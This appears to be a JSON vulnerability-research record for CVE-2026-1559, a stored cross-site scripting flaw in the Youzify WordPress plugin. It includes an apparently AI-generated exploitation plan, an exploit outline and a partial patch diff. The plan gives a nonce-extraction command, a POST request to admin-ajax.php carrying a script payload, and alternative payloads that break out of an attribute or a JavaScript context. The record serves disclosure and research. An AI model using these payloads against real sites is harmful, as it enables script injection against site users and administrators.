[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fiFTzfqKcvBEtBJv_tY8dDtMVwaQoB10ujXlodHffj08":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":30,"research_verified":31,"research_rounds_completed":32,"research_plan":33,"research_summary":34,"research_vulnerable_code":35,"research_fix_diff":36,"research_exploit_outline":37,"research_model_used":38,"research_started_at":39,"research_completed_at":40,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":31,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":31,"source_links":41},"CVE-2026-1559","youzify-authenticated-subscriber-stored-cross-site-scripting-via-checkinplaceid-parameter","Youzify \u003C= 1.3.6 - Authenticated (Subscriber+) Stored Cross-Site Scripting via 'checkin_place_id' Parameter","The Youzify plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'checkin_place_id' parameter in all versions up to, and including, 1.3.6 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Subscriber-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","youzify",null,"\u003C=1.3.6","1.3.7","medium",6.4,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:C\u002FC:L\u002FI:L\u002FA:N","Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","2026-04-17 11:35:43","2026-04-18 01:26:05",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F6bd69711-8303-4086-87c3-eb2935a89aff?source=api-prod",1,[22,23,24,25,26,27,28,29],"class-youzify.php","includes\u002Fadmin\u002Fclass-youzify-admin.php","includes\u002Fadmin\u002Fcore\u002Fclass-youzify-admin-ajax.php","includes\u002Fadmin\u002Fcore\u002Fclass-youzify-extensions.php","includes\u002Fadmin\u002Fcore\u002Fclass-youzify-member-types.php","includes\u002Fadmin\u002Fcore\u002Ffunctions\u002Fyouzify-account-functions.php","includes\u002Fadmin\u002Fcore\u002Ffunctions\u002Fyouzify-general-functions.php","includes\u002Fadmin\u002Fcore\u002Ffunctions\u002Fyouzify-profile-functions.php","researched",false,3,"# Exploitation Research Plan: CVE-2026-1559 - Youzify Stored XSS\n\n## 1. Vulnerability Summary\nThe **Youzify** plugin (formerly Youzer) for WordPress is vulnerable to **Stored Cross-Site Scripting (XSS)** in versions up to and including 1.3.6. The vulnerability exists because the plugin fails to sanitize or escape the `checkin_place_id` parameter when processing and displaying activity updates with \"check-in\" location data. An authenticated attacker with **Subscriber-level** access can inject malicious scripts into this parameter, which are then executed in the context of any user (including administrators) viewing the activity feed.\n\n## 2. Attack Vector Analysis\n- **Endpoint:** `\u002Fwp-admin\u002Fadmin-ajax.php`\n- **Action:** `youzify_post_update` (Registered via `bp_ajax_register_action` in `class-youzify.php`, Line 118).\n- **Vulnerable Parameter:** `checkin_place_id`\n- **Authentication Required:** Subscriber (PR:L) or higher.\n- **Preconditions:** BuddyPress must be active (Youzify depends on it), and the \"Check-in\" feature must be available on the activity wall.\n\n## 3. Code Flow\n1. **Entry Point:** The client sends an AJAX request to `admin-ajax.php` with the action `youzify_post_update`.\n2. **Registration:** `class-youzify.php` hooks this action via BuddyPress: \n   ```php\n   bp_ajax_register_action( 'youzify_post_update' );\n   ```\n3. **Processing (Inferred):** The logic resides in `YOUZIFY_CORE . 'functions\u002Fgeneral\u002Fyouzify-wall-functions.php'` (included in `class-youzify.php`, Line 50) or `class-youzify-ajax.php`. The handler retrieves `$_POST['checkin_place_id']` and saves it as activity metadata using `bp_activity_add_meta()` or stores it directly within the activity content string.\n4. **Display Sink (Inferred):** When the activity stream is rendered (frontend or backend), Youzify retrieves this metadata and outputs it inside an HTML attribute (e.g., `data-place-id=\"...\"`) or as part of a Google Maps initialization script without using `esc_attr()` or `esc_js()`.\n\n## 4. Nonce Acquisition Strategy\nThe `youzify_post_update` action is protected by a BuddyPress\u002FYouzify nonce.\n1. **Shortcode Identification:** The Youzify activity wall is typically rendered using the shortcode `[youzify_activity]`.\n2. **Setup:** Create a public page containing this shortcode.\n3. **Extraction:**\n   - Navigate to the page as an authenticated Subscriber.\n   - Youzify localizes its configuration into a global JavaScript object. Use `browser_eval` to extract the nonce.\n   - **Potential Variable:** `youzify_vars.activity_nonce` or `youzify_vars.nonce`.\n   - **Form Field:** Check for a hidden input named `_wpnonce_post_update` inside the activity posting form.\n\n**Agent Command:**\n```javascript\n\u002F\u002F Attempt to find the nonce in localized vars or form fields\nbrowser_eval(\"window.youzify_vars?.activity_nonce || jQuery('#_wpnonce_post_update').val() || jQuery('input[name=\\\"_wpnonce\\\"]').val()\");\n```\n\n## 5. Exploitation Strategy\nThe exploit involves sending a POST request to the AJAX endpoint simulating an activity update with a malicious location ID.\n\n**HTTP Request:**\n- **URL:** `{{BASE_URL}}\u002Fwp-admin\u002Fadmin-ajax.php`\n- **Method:** `POST`\n- **Headers:** `Content-Type: application\u002Fx-www-form-urlencoded`\n- **Body Parameters:**\n    - `action`: `youzify_post_update`\n    - `_wpnonce_post_update`: `{{EXTRACTED_NONCE}}`\n    - `content`: `Enjoying the view! #CheckIn`\n    - `checkin_place_id`: `\">\u003Cscript>alert(document.domain)\u003C\u002Fscript>`\n    - `checkin_place_name`: `Malicious Location`\n    - `cookie`: `{{SUBSCRIBER_COOKIES}}`\n\n## 6. Test Data Setup\n1. **Plugin Installation:** Install Youzify 1.3.6 and BuddyPress.\n2. **User Creation:** Create a user with the `subscriber` role.\n3. **Page Creation:** \n   ```bash\n   wp post create --post_type=page --post_title=\"Activity Feed\" --post_status=publish --post_content='[youzify_activity]'\n   ```\n4. **Configuration:** Ensure that the \"Check-in\" or \"Location\" feature is enabled in Youzify settings (Wall Settings).\n\n## 7. Expected Results\n- The AJAX response should return a `success` status (usually JSON `{\"success\": true, \"data\": \"...\"}`).\n- A new activity item will be created in the database.\n- When an administrator views the \"Activity\" page in the dashboard or the frontend feed, the injected script `\u003Cscript>alert(document.domain)\u003C\u002Fscript>` will execute.\n\n## 8. Verification Steps\n1. **Check Database via CLI:**\n   Verify the metadata was stored raw:\n   ```bash\n   wp db query \"SELECT meta_value FROM wp_bp_activity_meta WHERE meta_key = 'checkin_place_id' ORDER BY id DESC LIMIT 1;\"\n   ```\n2. **Check Activity Content:**\n   ```bash\n   wp db query \"SELECT content FROM wp_bp_activity ORDER BY id DESC LIMIT 1;\"\n   ```\n3. **Verify Execution:**\n   Navigate to the Activity page as Admin using `browser_navigate` and check if the `alert` or a specific DOM element created by the script is present.\n\n## 9. Alternative Approaches\nIf `checkin_place_id` is reflected inside an attribute rather than raw HTML, the payload should be adjusted:\n- **Attribute Breakout:** `x\" onmouseover=\"alert(1)\" data-id=\"`\n- **JS Sink:** If the ID is passed to a Google Maps function like `initMap('PAYLOAD')`, use: `');alert(1);\u002F\u002F`\n- **Endpoint Check:** If `youzify_post_update` is not the correct action, search for `wp_ajax_` hooks in the `includes\u002F` directory specifically for \"checkin\" or \"location\" strings:\n  ```bash\n  grep -r \"checkin_place_id\" .\n  ``` (This would be the first step for the agent if the primary endpoint fails).","The Youzify plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'checkin_place_id' parameter in versions up to 1.3.6. Authenticated attackers with Subscriber-level access can inject malicious web scripts into activity updates, which then execute in the context of any user (including administrators) viewing the activity stream.","\u002F\u002F class-youzify.php line 117\nfunction register_actions() {\n    bp_ajax_register_action( 'youzify_delete_activity' );\n    bp_ajax_register_action( 'youzify_post_update' );\n}\n\n\u002F\u002F Logic resides in YOUZIFY_CORE . 'class-youzify-ajax.php' (Included in class-youzify.php line 68)\n\u002F\u002F The handler for 'youzify_post_update' processes $_POST['checkin_place_id'] without sufficient sanitization before storage or output escaping during rendering.","diff -ru \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fyouzify\u002F1.3.6\u002Fclass-youzify.php \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fyouzify\u002F1.3.7\u002Fclass-youzify.php\n--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fyouzify\u002F1.3.6\u002Fclass-youzify.php\t2026-01-15 10:09:20.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fyouzify\u002F1.3.7\u002Fclass-youzify.php\t2026-03-15 20:18:08.000000000 +0000\n@@ -1,4 +1,5 @@\n-\u003C?php\n+\u003C?php\n+if ( ! defined( 'ABSPATH' ) ) exit;\n \n if ( ! class_exists( 'Youzify' ) ) :\n \ndiff -ru \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fyouzify\u002F1.3.6\u002Fincludes\u002Fadmin\u002Fclass-youzify-admin.php \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fyouzify\u002F1.3.7\u002Fincludes\u002Fadmin\u002Fclass-youzify-admin.php\n--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fyouzify\u002F1.3.6\u002Fincludes\u002Fadmin\u002Fclass-youzify-admin.php\t2026-01-15 10:09:20.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fyouzify\u002F1.3.7\u002Fincludes\u002Fadmin\u002Fclass-youzify-admin.php\t2026-03-15 20:18:08.000000000 +0000\n@@ -1,4 +1,5 @@\n \u003C?php\n+if ( ! defined( 'ABSPATH' ) ) exit;\n \n class Youzify_Admin {\n \n@@ -148,7 +149,9 @@\n             \u003Cdiv class=\"youzify-container\">\n                 \u003Cdiv class=\"youzify-review-image\">\u003Cimg src=\"\u003C?php echo YOUZIFY_ADMIN_ASSETS . 'images\u002Flogo.png'; ?>\" alt=\"\">\u003C\u002Fdiv>\n                 \u003Cdiv style=\"margin-left:30px\">\n-                    \u003C?php printf(__(\"\u003Cp>Hi, Thanks a lot for choosing Youzify to be a part of your project — It's an honor!\u003C\u002Fp>\u003Cp>In the past years we dedicated our lives by working day and night on Youzify doing our best to deliver high quality features and we are still constantly striving to provide ideal experience for our customers.\u003C\u002Fp>\u003Cp>Online reviews from awesome customers like you help others feel confident about choosing Youzify, and will really help us grow our business. If you don't mind could you take a moment to leave us a 5-Star rating and a good review? I would really appreciate it. Thank you in advance for helping us out!\u003C\u002Fp>\u003Cp>If you have any questions or feedback, %sdon't hesitate to leave us a message%s.\u003C\u002Fp>\", 'youzify'),'\u003Ca href=\"https:\u002F\u002Fyouzify.com\u002Fcontact\" target=\"_blank\" style=\"text-decoration: underline; color: #fff06e;\">','\u003C\u002Fa>'); ?>\n+                    \u003C?php\n+                    \u002F* translators: %1$s: opening link tag, %2$s: closing link tag *\u002F\n+                    printf( __( '\u003Cp>Hi, Thanks a lot for choosing Youzify to be a part of your project — It\\'s an honor!\u003C\u002Fp>\u003Cp>In the past years we dedicated our lives by working day and night on Youzify doing our best to deliver high quality features and we are still constantly striving to provide ideal experience for our customers.\u003C\u002Fp>\u003Cp>Online reviews from awesome customers like you help others feel confident about choosing Youzify, and will really help us grow our business. If you don\\'t mind could you take a moment to leave us a 5-Star rating and a good review? I would really appreciate it. Thank you in advance for helping us out!\u003C\u002Fp>\u003Cp>If you have any questions or feedback, %1$sdon\\'t hesitate to leave us a message%2$s.\u003C\u002Fp>', 'youzify' ), '\u003Ca href=\"https:\u002F\u002Fyouzify.com\u002Fcontact\" target=\"_blank\" style=\"text-decoration: underline; color: #fff06e;\">', '\u003C\u002Fa>' ); ?>\n                     \u003Ci style=\"color: #ffeb3b;\">- Youssef Kaine | KaineLabs CEO\u003C\u002Fi>\n                     \u003Cdiv class=\"youzify-buttons-row\">\n                         \u003Ca class=\"button button-primary\" target=\"_blank\"","1. Authenticate as a Subscriber-level user.\n2. Obtain a valid Youzify activity nonce (e.g., `_wpnonce_post_update`) by inspecting the activity feed page or localized `youzify_vars` JavaScript object.\n3. Send a POST request to the WordPress AJAX endpoint `\u002Fwp-admin\u002Fadmin-ajax.php` with the following parameters:\n   - action: `youzify_post_update` \n   - _wpnonce_post_update: [EXTRACTED_NONCE]\n   - content: Any activity text\n   - checkin_place_id: A malicious script payload such as `\">\u003Cscript>alert(document.domain)\u003C\u002Fscript>`\n   - checkin_place_name: A location name\n4. The script will be stored in the activity metadata and will execute whenever any user (including an Administrator) views the activity stream where the location data is rendered.","gemini-3-flash-preview","2026-04-20 20:10:46","2026-04-20 20:11:13",{"type":42,"vulnerable_version":43,"fixed_version":11,"vulnerable_browse":44,"vulnerable_zip":45,"fixed_browse":46,"fixed_zip":47,"all_tags":48},"plugin","1.3.6","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fyouzify\u002Ftags\u002F1.3.6","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fyouzify.1.3.6.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fyouzify\u002Ftags\u002F1.3.7","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fyouzify.1.3.7.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fyouzify\u002Ftags"]